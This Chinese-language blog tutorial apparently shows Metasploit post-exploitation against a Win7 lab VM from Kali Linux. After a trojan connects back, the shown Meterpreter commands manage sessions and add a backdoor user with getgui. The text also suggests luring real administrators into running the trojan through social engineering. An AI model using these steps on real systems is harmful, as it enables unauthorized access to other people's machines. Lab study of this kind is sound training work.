Win7|网络安全工程师演示：黑客是如何进行Win7攻防实战(准备篇) 低薪|中薪|网络安全|黑客|工程

课前声明：

文章插图
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework，简称叫做MSF。Metasploit作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？接下来让我们一起学习！
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3、战略安排
3.1 查看攻击者主机（Kali Linux）控制台的会话信息，如下图所示。
PS:这个界面是拿下目标主机后的Metasploit（msf）会话窗口，如何拿下目标主机请查看上文。
命令：sessions

文章插图
3.2 在受害者主机执行生成的木马文件，使其返回连接到攻击者主机，建立会话，如下图所示。（实验环境下我们可以操纵受害者主机双击运行木马文件，实际渗透测试过程中则需要你利用社会工程学的有关知识诱导受害者管理员执行木马文件）

文章插图
3.3 在受害者主机执行相应的木马文件之后，在攻击者主机查看是否已经建立起来了相应的会话信息，如下图所示。
命令：sessions

文章插图
3.4 根据控制台产生的会话信息切换到你想切换的会话中，如下图所示。
命令：sessions -i 会话ID
例子：sessions -i 5(连接到会话ID为5的会话）

文章插图
3.5 运行相应的脚本文件在受害者主机建立用户，如下图所示。
命令：run getgui -u 用户名 -p 密码
例子：run getgui -u hacker -p 123456

文章插图
3.6 进入受害者主机，利用命令查看刚在在攻击者主机建立的用户是否建立成功，如下图所示。
命令：Win+R
命令：cmd
命令：user

文章插图
3.7 查看受害者主机是否开启了远程桌面服务，查看方法如下图所示。
【 Win7|网络安全工程师演示：黑客是如何进行Win7攻防实战(准备篇)】步骤：Windows/计算机/系统属性/高级系统设置/远程

文章插图

文章插图

文章插图

文章插图
可见，该受害者主机的远程桌面服务是没有打开的，接下来我们一起来学习一下如何在攻击者主机终端利用脚本远程打开受害者主机的远程桌面服务，敬请期待下章节！

文章插图
PS：到此学习完毕，谢谢观看，获取更多干货请持续关注本号！

文章插图
原创不易，各位看官记得好评加关注哦！你也可点击了解更多，或搜索：Kali与编程，学习更多Kali Linux渗透与白帽编程技巧哦！

文章插图